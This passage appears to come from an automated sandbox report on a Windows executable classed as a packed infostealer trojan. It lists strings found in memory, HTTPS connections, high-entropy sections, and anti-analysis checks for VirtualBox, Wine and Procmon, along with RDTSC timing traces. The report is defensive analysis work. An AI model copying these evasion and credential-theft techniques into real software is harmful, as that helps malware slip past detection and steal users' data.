                Source: LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.co:
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2

                System Summary

                barindex
                Source: LNn56KMkEE.exeStatic PE information: section name:
                Source: LNn56KMkEE.exeStatic PE information: section name: .idata
                Source: LNn56KMkEE.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_010121610_3_01012161
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588D9FB0_3_0588D9FB
                Source: LNn56KMkEE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: LNn56KMkEE.exeStatic PE information: Section: ZLIB complexity 0.9973646190068494
                Source: LNn56KMkEE.exeStatic PE information: Section: srolqark ZLIB complexity 0.9948659202904002
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: LNn56KMkEE.exe, 00000000.00000003.1775865008.00000000058BD000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776312423.000000000588A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: LNn56KMkEE.exeVirustotal: Detection: 67%
                Source: LNn56KMkEE.exeReversingLabs: Detection: 60%
                Source: LNn56KMkEE.exeString found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile read: C:\Users\user\Desktop\LNn56KMkEE.exeJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: LNn56KMkEE.exeStatic file information: File size 1866752 > 1048576
                Source: LNn56KMkEE.exeStatic PE information: Raw size of srolqark is bigger than: 0x100000 < 0x19f600

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeUnpacked PE file: 0.2.LNn56KMkEE.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;srolqark:EW;yixtsbvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;srolqark:EW;yixtsbvq:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: LNn56KMkEE.exeStatic PE information: real checksum: 0x1d1237 should be: 0x1d100f
                Source: LNn56KMkEE.exeStatic PE information: section name:
                Source: LNn56KMkEE.exeStatic PE information: section name: .idata
                Source: LNn56KMkEE.exeStatic PE information: section name:
                Source: LNn56KMkEE.exeStatic PE information: section name: srolqark
                Source: LNn56KMkEE.exeStatic PE information: section name: yixtsbvq
                Source: LNn56KMkEE.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588CF4F push eax; iretd 0_3_0588CF55
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588CF5F pushad ; iretd 0_3_0588CF65
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588CF67 push 700588CFh; iretd 0_3_0588CF71
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588CF4F push eax; iretd 0_3_0588CF55
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588CF5F pushad ; iretd 0_3_0588CF65
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0588CF67 push 700588CFh; iretd 0_3_0588CF71
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_01047E44 push esi; retf 0_3_01047E47
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeCode function: 0_3_0104618C push esi; retf 0_3_0104618F
                Source: LNn56KMkEE.exeStatic PE information: section name: entropy: 7.979452992812568
                Source: LNn56KMkEE.exeStatic PE information: section name: srolqark entropy: 7.954307245749782

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 67529E second address: 6752AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2ADCE7BD66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6752AF second address: 6752B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6752B6 second address: 6752D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2ADCE7BD77h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6742B0 second address: 6742CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B43h 0x00000007 jg 00007F2ADCE78B36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6742CD second address: 6742EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2ADCE7BD70h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6742EC second address: 6742F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6742F0 second address: 6742FE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6742FE second address: 674302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 674302 second address: 674308 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 674442 second address: 674469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jne 00007F2ADCE78B36h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 674469 second address: 67447D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2ADCE7BD6Ah 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 67473D second address: 674741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6748D8 second address: 6748DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6748DC second address: 6748E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 674BBA second address: 674BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD77h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 674BD7 second address: 674BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 677EE3 second address: 677EED instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 677EED second address: 677EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 677EF3 second address: 677EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 677EF7 second address: 677EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6781AA second address: 6781E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2ADCE7BD76h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6781E0 second address: 6781EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6781EA second address: 6781EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6781EE second address: 678288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F2ADCE78B42h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jbe 00007F2ADCE78B3Eh 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F2ADCE78B38h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov esi, 668CA51Ah 0x00000039 push 00000003h 0x0000003b add dword ptr [ebp+122D1AC0h], edi 0x00000041 jmp 00007F2ADCE78B43h 0x00000046 push 00000000h 0x00000048 mov edi, 1EB64E3Fh 0x0000004d push 00000003h 0x0000004f call 00007F2ADCE78B39h 0x00000054 pushad 0x00000055 jmp 00007F2ADCE78B42h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 678288 second address: 6782C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F2ADCE7BD72h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnc 00007F2ADCE7BD6Eh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push edi 0x0000001b jne 00007F2ADCE7BD66h 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6782C2 second address: 6782C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6782C6 second address: 678328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnc 00007F2ADCE7BD70h 0x00000011 pop eax 0x00000012 or cx, A56Eh 0x00000017 mov edi, dword ptr [ebp+122D27ECh] 0x0000001d lea ebx, dword ptr [ebp+12453D56h] 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F2ADCE7BD68h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d xchg eax, ebx 0x0000003e jo 00007F2ADCE7BD6Ah 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 pop edx 0x00000048 push eax 0x00000049 push ebx 0x0000004a js 00007F2ADCE7BD6Ch 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6891C0 second address: 6891C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 662505 second address: 662524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F2ADCE7BD78h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 662524 second address: 66252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 66252A second address: 662561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2ADCE7BD78h 0x0000000c jmp 00007F2ADCE7BD78h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 695EA2 second address: 695EBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
